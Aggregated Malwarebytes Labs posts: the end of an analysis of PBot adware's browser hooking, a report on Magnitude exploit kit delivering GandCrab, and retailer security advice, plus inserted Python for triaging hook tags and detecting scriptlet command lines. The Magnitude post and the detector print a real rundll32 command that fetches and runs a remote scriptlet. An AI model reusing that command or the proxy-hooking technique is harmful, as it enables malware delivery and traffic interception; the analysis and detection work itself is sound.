It comes with two hardcoded DLLs: one 32-bit and one 64-bit (both stored in the overlay of the PE file and not obfuscated). Those DLLs are the components that are further injected into the browsers selected by the configuration. Their names are, appropriately, injectee-x86.dll and injectee-x64.dll:

The injectee (DLL)

The execution of injectee DLL starts in the exported function, InjectorEntry:

The injectee is implanted in a browser and responsible for hooking its DLLs. Here’s the beginning of the hooking function:

The hooking function is pretty standard for this type of malware. It retrieves the addresses of the specified exported functions, then overwrites the beginning of each function, redirecting it to the corresponding function within the malicious DLL.

The targets are functions responsible for parsing certificates (in Crypt32.dll), as well as functions responsible for sending and receiving data (in ws32_dll):

When we dump the hooks via PE-sieve, we can directly see how those functions have been redirected to the malware. Here is the list of tags gathered from the appropriate DLLs:

From Crypt32:

16ccf;CertGetCertificateChain->510b0;5
1cae2;CertVerifyCertificateChainPolicy->513d0;5
1e22b;CertFreeCertificateChain->51380;5

From ws32_dll:

3918;closesocket->50c80;5
4406;WSASend->50d90;5
6b0e;recv->50ea0;5
6bdd;connect->50780;5
6f01;send->50c90;5
7089;WSARecv->50fa0;5
cc3f;WSAConnect->50ab0;5
1bfdd;WSAConnectByList->50c70;5
1c52f;WSAConnectByNameW->50c50;5
1c8b6;WSAConnectByNameA->50c60;5

In both cases, we can see that the addresses have been redirected to the injectee DLL that was loaded at the base 50000.

So, for example, the function WSASend gets intercepted and the execution is redirected to a function at RVA 0xd90 in the injectee dll:

The beginning of the intercepting function:

In this way, all the requests are redirected to the malware. It can work as a proxy, altering data on the way.

After the proxy function finishes, it jumps back to the original function, so the user doesn’t realize any change in the functionality.
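Reading the PE-sieve tags above by hand is fine for a dozen hooks, but the same triage can be automated: parse each `rva;function->target;size` tag, find which loaded module owns the target address, and keep only hooks that leave the hooked DLL. The block below is an added example written for this post (it is not PE-sieve's code and not the article's). The tag lines are a subset of those printed above; the injectee base of 0x50000 is the one stated above, while the Crypt32 and ws32_dll bases and all module sizes are constructed assumptions.

```python
"""Resolve PE-sieve style hook tags to the module each hook jumps into.
Added example; tag format as shown in the post: <rva>;<function>-><target>;<size>."""
import re
from dataclasses import dataclass
from typing import List, Optional

TAG_RE = re.compile(
    r"^(?P<rva>[0-9a-fA-F]+);(?P<name>[^;]+?)->(?P<target>[0-9a-fA-F]+);(?P<size>\d+)$"
)


@dataclass(frozen=True)
class Module:
    name: str
    base: int
    size: int

    def contains(self, address: int) -> bool:
        return self.base <= address < self.base + self.size


@dataclass(frozen=True)
class Hook:
    hooked_module: str
    function: str
    rva: int            # RVA of the patched export inside the hooked DLL
    target: int         # absolute address the patch jumps to
    patched_bytes: int  # length of the overwritten prologue
    target_module: Optional[str] = None
    target_rva: Optional[int] = None


def parse_tag(line: str, hooked_module: str) -> Hook:
    m = TAG_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised tag: {line!r}")
    return Hook(hooked_module, m["name"], int(m["rva"], 16), int(m["target"], 16), int(m["size"]))


def resolve(hooks: List[Hook], modules: List[Module]) -> List[Hook]:
    """Attach the owning module and module-relative RVA to each hook target."""
    resolved = []
    for h in hooks:
        owner = next((m for m in modules if m.contains(h.target)), None)
        resolved.append(Hook(h.hooked_module, h.function, h.rva, h.target, h.patched_bytes,
                             owner.name if owner else None,
                             h.target - owner.base if owner else None))
    return resolved


def foreign_hooks(hooks: List[Hook]) -> List[Hook]:
    """Hooks whose target lies outside the hooked DLL itself."""
    return [h for h in hooks if h.target_module != h.hooked_module]


# Tag lines as listed in the post (a subset)
CRYPT32_TAGS = [
    "16ccf;CertGetCertificateChain->510b0;5",
    "1cae2;CertVerifyCertificateChainPolicy->513d0;5",
]
WS_TAGS = [
    "4406;WSASend->50d90;5",
    "6b0e;recv->50ea0;5",
    "6bdd;connect->50780;5",
]

# Constructed module map: Crypt32/ws32_dll bases and all sizes are hypothetical;
# only the injectee base 0x50000 comes from the post.
MODULES = [
    Module("Crypt32", 0x74A00000, 0x1A0000),
    Module("ws32_dll", 0x76C00000, 0x40000),
    Module("injectee-x86.dll", 0x50000, 0x20000),
]


def analyse(crypt32_tags=CRYPT32_TAGS, ws_tags=WS_TAGS, modules=MODULES) -> List[Hook]:
    hooks = [parse_tag(t, "Crypt32") for t in crypt32_tags]
    hooks += [parse_tag(t, "ws32_dll") for t in ws_tags]
    return foreign_hooks(resolve(hooks, modules))


if __name__ == "__main__":
    for h in analyse():
        print(f"{h.hooked_module}!{h.function} (RVA {h.rva:#x}) -> "
              f"{h.target_module}+{h.target_rva:#x} ({h.patched_bytes} bytes patched)")
```

With the module map filled in from the same process snapshot PE-sieve scanned, the output names the exact function each export now lands in (WSASend resolves to `injectee-x86.dll+0xd90`, matching the RVA quoted above). A hook whose target falls in no known module is worth treating as a shellcode stub rather than dismissing.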


This malware is pretty simple, does not contain much obfuscation, and was probably not intended to be stealthy. Rather than hiding, it tries to look harmless and legitimate. However, the functionality that it delivers is powerful enough to cause serious harm. It may be configured to display harmless ads, but it could also be configured to modify the website’s content in any other way, for example by displaying phishing pop-ups, as was implemented in Kronos. Also, the fact that it forges certificates of the sites should raise concerns.

The post PBot: a Python-based adware appeared first on Malwarebytes Labs.


Magnitude exploit kit switches to GandCrab ransomware

Malwarebytes - Tue, 04/17/2018 - 16:58

The GandCrab ransomware is reaching far and wide via malspam, social engineering schemes, and exploit kit campaigns. On April 16, we discovered that Magnitude EK, which had been loyal to its own Magniber ransomware, was now being leveraged to push out GandCrab, too.

While Magnitude EK remains focused on targeting South Koreans, we were able to infect an English version of Windows by replaying a previously recorded infection capture. This is an interesting departure from Magniber, which was extremely thorough at avoiding other geolocations.

Magnitude is now also using a fileless technique to load the ransomware payload, making it somewhat harder to intercept and detect. Variations of this technique have been known for several years and used by other families such as Poweliks, but they are a new addition to Magnitude.

Figure 1: Magnitude EK traffic capture with the GandCrab payload

Magnitude has always experimented with unconventional ways to load its malware, for example via binary padding, or more recently via another technique, but still exposing it “in the clear” from traffic or network packet capture.

Figure 2: Magnitude EK dropping Magniber on April 4, 2018

The payload is encoded (using VBScript.Encode/JScript.Encode) and embedded in a scriptlet that is later decoded in memory and executed.

"C:\Windows\System32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication "; document.write();GetObject('script:http://dx30z30a4t11l7be.lieslow[.]faith/5aad4b91a0da20d4faab0991bdbe7138')

Figure 3: Innocuous scriptlet hides the payload
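The command line in Figure 3 combines three things that rarely appear together in legitimate process creation: rundll32 handed a `javascript:` URL, a call into mshtml's RunHTMLApplication, and a `GetObject('script:...')` moniker that fetches a remote scriptlet. The block below is an added example written for this post (not Malwarebytes' detection logic) that scores a process-creation command line on those indicators and extracts the scriptlet URL. The `Image=...|CommandLine=...` event format and the benign events are constructed; the malicious command line is the one printed above, domain defanged as in the post.

```python
"""Flag rundll32/javascript: scriptlet loading in process-creation command lines.
Added example for this post; the event format and benign samples are constructed."""
import re
from typing import Dict, List, Optional

# GetObject('script:<url>') pulls a remote scriptlet through the script: moniker
SCRIPT_MONIKER_RE = re.compile(
    r"GetObject\(\s*['\"]script:(?P<url>[^'\"]+)['\"]\s*\)", re.IGNORECASE
)


def analyze_command_line(cmd: str) -> Dict[str, object]:
    """Return a verdict dict: suspicious flag, indicator names and any scriptlet URL."""
    lower = cmd.lower()
    indicators: List[str] = []
    if "rundll32" in lower and "javascript:" in lower:
        indicators.append("rundll32_with_javascript_protocol")
    if "runhtmlapplication" in lower:
        indicators.append("mshtml_runhtmlapplication")
    m = SCRIPT_MONIKER_RE.search(cmd)
    url: Optional[str] = m.group("url") if m else None
    if url:
        indicators.append("remote_script_moniker")
    # Any two of the three describe the technique; one alone may be benign tooling.
    return {"suspicious": len(indicators) >= 2, "indicators": indicators, "url": url}


def scan_events(events) -> List[Dict[str, object]]:
    """events: iterable of 'Image=...|CommandLine=...' lines (constructed format)."""
    findings = []
    for line in events:
        fields = dict(part.split("=", 1) for part in line.split("|") if "=" in part)
        verdict = analyze_command_line(fields.get("CommandLine", ""))
        if verdict["suspicious"]:
            findings.append({"image": fields.get("Image"), **verdict})
    return findings


# The command line shown in the post (domain defanged there as lieslow[.]faith)
MAGNITUDE_CMD = r'''"C:\Windows\System32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication "; document.write();GetObject('script:http://dx30z30a4t11l7be.lieslow[.]faith/5aad4b91a0da20d4faab0991bdbe7138')'''

# Constructed sample events: two ordinary process launches and the Magnitude one
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\rundll32.exe|CommandLine=rundll32.exe shell32.dll,Control_RunDLL",
    r"Image=C:\Windows\System32\rundll32.exe|CommandLine=" + MAGNITUDE_CMD,
    r"Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c dir",
]


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['image']}: {', '.join(f['indicators'])} -> {f['url']}")
```

The extracted URL is what you would pivot on in proxy or DNS logs to find other hosts that fetched the same scriptlet; the plain `shell32.dll,Control_RunDLL` launch scores one indicator at most and stays quiet.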

After the payload is injected into explorer.exe, it immediately attempts to reboot the machine. If we suspend that process and use @hasherezade‘s PE-Sieve, we can actually dump the GandCrab DLL from memory:

Figure 4: Extracting the payload from memory using PE-Sieve

Upon successful infection, files will be encrypted with the .CRAB extension while a ransom note is left with instructions on the next steps required to recover those files.

Figure 5: GandCrab’s ransom note

A recent law enforcement operation provided victims with a way to recover their files from previous GandCrab infections. However, the latest version cannot be decrypted at the moment.

Malwarebytes users are protected against this attack when either the Internet Explorer (CVE-2016-0189) or Flash Player (CVE-2018-4878) exploits are fired.

Time will tell if Magnitude sticks to GandCrab, but this is a noteworthy change for an exploit kit that solely used its own Magniber ransomware for about 7 months, after having replaced the trusted Cerber.

Indicators of compromise

Dumped GandCrab DLL


The post Magnitude exploit kit switches to GandCrab ransomware appeared first on Malwarebytes Labs.


5 cybersecurity questions retailers must ask to protect their businesses

Malwarebytes - Tue, 04/17/2018 - 15:00

The Target breach in 2013 may not be the biggest retail breach in history, but for many retailers, it was their watershed moment.

Point-of-sale (PoS) terminals were compromised for more than two weeks. 40 million card details and 70 million records of personal information were swiped, part of which was “backlist,” historical transaction information dating back roughly a decade. Card unions paid over $200 million in costs for card reissues, and then filed a class-action lawsuit against Target to recover that cost.

And the most mind-blowing fact of all? Target actually had (and still does have) cybersecurity measures in place and a security policy for employees to follow. How and why the breach even happened the way it happened remained the subject of discussion for a long time, and hard lessons were learned.

The good news for retailers is that it doesn’t (always) have to be this way.

Pose the right questions

Retailers of all shapes and sizes care about their businesses and clients. No merchant would want to be in the shoes of Target or TJX for a minute, post-breach. In fact, if they can keep something as big and messy and costly from happening to them, they would do anything.

It’s understandably challenging to add more to an already tall order of “things to do” in the retail industry; however, cybersecurity should no longer be seen as an afterthought, nor should it be treated like an option that one can get hyped up about today and then forget tomorrow. It has quickly become an integral part of any organization for the sake of business continuity, client retention, and brand integrity.

If you remain unconvinced whether you really need to incorporate cybersecurity in your business, perhaps this is a thought you can consider: If your organization uses any form of technology that connects to a data communication avenue and/or the Internet, chances are you need cybersecurity.

“Where do I start?” is probably not the right question to ask once you decide to kick off this journey, for you’ll most certainly receive an “I don’t know” or “I have no idea” just as instantly. Instead, be specific and practical. Come up with questions that you think you can answer. We have listed some below that you can use to guide you on your way.

What am I using in business that needs protecting?

Here, you can list down your valuable assets, beginning with the tangible (the retail store, CCTV cameras, mobile phones, point-of-sale machines, etc.) and then the intangible (your website, customer data, intellectual property, etc.). Once done, you can then find out ways to secure them individually according to your business’s needs. Most of the time, all you need to do is to configure your devices and peripherals to make the most use of security-related settings.

For example, installing smart CCTV cameras on-premise can both lessen the risk of physical theft and aid law enforcement in capturing criminals should something terrible happen in the shop. But who is watching your watcher? Better yet: Who else could be watching through your watcher? A lot of CCTV cameras can be accessed publicly via the Internet. You can secure these cameras and ensure that you and your staff are the only ones who can use them by setting them up to local-only mode and changing their admin names and passwords.

You may also decide to seek help from your service provider with more complicated devices and systems.

Read: Why you don’t need 27 different passwords

Should you wish to invest in software or tools, pick those that protect as many of your assets as possible. For example, many endpoint security solutions allow users to install them on multiple devices running Windows.

What are the threats that can potentially affect my business?

Cybersecurity threats to retail businesses can come in the form of people or technology. We’re quite familiar with the former: from the petty thief to an organized crime group. There are also malicious insiders and basically anyone meaning to make money out of your business.

On the other hand, one thing merchants miss when identifying what could potentially introduce threats to their companies is the very technology (apps, modern payment systems, and others) they use or invest in to remain competitive. The dangers or risks introduced by these are usually accidental and can be avoided entirely.

Customer data remains the primary target of fraud in the retail industry. For those who may not be in the know, a single customer’s data may contain their credit or debit card details, spending patterns or habits, and loyalty behaviors, which can be retrieved from online shopping, digital marketing, and the loyalty schemes they’re enrolled in.

Other threats retailers must keep in mind and defend against include malicious insiders, spear phishing, DDoS attacks, brute force attacks, reconnaissance and suspicious activity, supply chain attacks, and more. If you’re a merchant that uses the omni-channel approach, be aware that there is now a new type of fraud in this environment. We’ll tackle this in depth in a future post.

How can I keep cybersecurity threats away from my business?

Merchants have gotten really good at handling traditional risks and threats to their businesses. But managing potential physical risks, which is fantastic, is one thing, and managing digital risks is another. For new and old merchants alike, thankfully they don’t have to start from scratch. There are already industry standards in place, such as the Payment Card Industry Security Council’s Data Security Standard (PCI DSS), that they can readily glean from. The Object Management Group (OMG), an international technology standards consortium, also has a cybersecurity standard that merchants may want to look into as well. And, oh, if you have clients in the UK and EU countries, let’s not forget GDPR.

As for other cybersecurity threats that need addressing, such as those that affect a merchant’s website, our Labs blog has a lot of great resources:

The National Federation of Retail Newsagents (NFRN), an organization composed of thousands of independent retailers in the UK and Northern Ireland, published a booklet that also serves as a checklist for merchants regarding assessing retail crime risk. This list includes physical security and cybersecurity.

Lastly, merchants must decide on a regular time to conduct a risk assessment—monthly, quarterly, biannually, or annually.

Should my employees get involved in mitigating cybersecurity risks?

Absolutely. When it comes to implementing good security practices in a retail business, merchants cannot do it alone. One way they can start employees off is by creating a culture of cybersecurity at the very beginning. Merchants can even incorporate awareness and basic cybersecurity concepts in their training process for new hires. Get them up to speed with the kinds of digital threats the business may come face-to-face with at some point in the future and provide them the steps on how to respond efficiently to red alert cases.

Read: How to create an intentional culture of cybersecurity

Note that training must be done on a regular basis and not just a one-off occurrence. It must also be relevant, practical, and engaging to employees. Use familiar case studies like the Target breach, or if your organization has experienced a form of cyberattack in the past, use that as a teaching moment, too.

What else can I do once I’ve secured the business’s assets?

Once you’ve done a great deal of securing, realize that the job doesn’t end there. There are still some things that need to be done:

  • Monitor your PCI environment on a regular basis. Doing so will notify you in real time of potential intrusions in your payment system so you can nip the threat in the bud before circumstances escalate.
  • Schedule a regular audit of security and compliance. This will ensure that your retail business remains in compliance with security and industry standards.
  • Join a community. Information sharing among fellow merchants is becoming a trend when it comes to cybersecurity. Firms learn from each other’s victories and mistakes. After all, cybercrime is not just a problem of one but of every organization in the industry. Cybersecurity, in this regard, is now a community effort.
  • Keep learning. Staying on top of the latest security news and industry challenges can help merchants familiarize themselves with tactics threat actors are using against retailers, assess their current situation, and make adjustments to their defenses and protocols accordingly.
  • Prioritize security and privacy when creating apps. Should you choose to develop software, such as apps, that you encourage your clients to install, make sure you have security in mind when building them.
  • Create a security policy. This makes good computing practices feel not just like guidelines but like actual procedures employees need to adhere to. Here are sample templates merchants can use and tweak to their preference.

Stop chasing the wrong answers

Breaches are inevitable. This is a known fact and an often-repeated line by people in the cybersecurity industry. Companies have been advised to prepare.

That said, perhaps a merchant’s next and final question would be this: If a breach is inevitable, then what’s the point of doing all this?

It’s true that no one wants to invest a lot of time and money in security tools, services, and people to fight off breaches only to be told it’s not possible. The message they’re hearing is “the bad guys always win, and there’s nothing you can do about it.” However, this isn’t in-line with reality at all.

While there’s no such thing as perfect security, the protocols a multitude of companies have in place have already helped them stop many breach attempts.

Unfortunately, sometimes threat actors do succeed in infiltrating a retailer’s network. In this case, the logical action is to contain the intrusion to prevent it from escalating and causing more damage. But containment and preventive steps cannot be taken if proper security measures, guidelines, and a good security architecture aren’t in place to begin with. Also, identifying what made the attack successful so the organization can make changes is part of the overall cybersecurity strategy. So putting these measures in place isn’t for naught.

The post 5 cybersecurity questions retailers must ask to protect their businesses appeared first on Malwarebytes Labs.


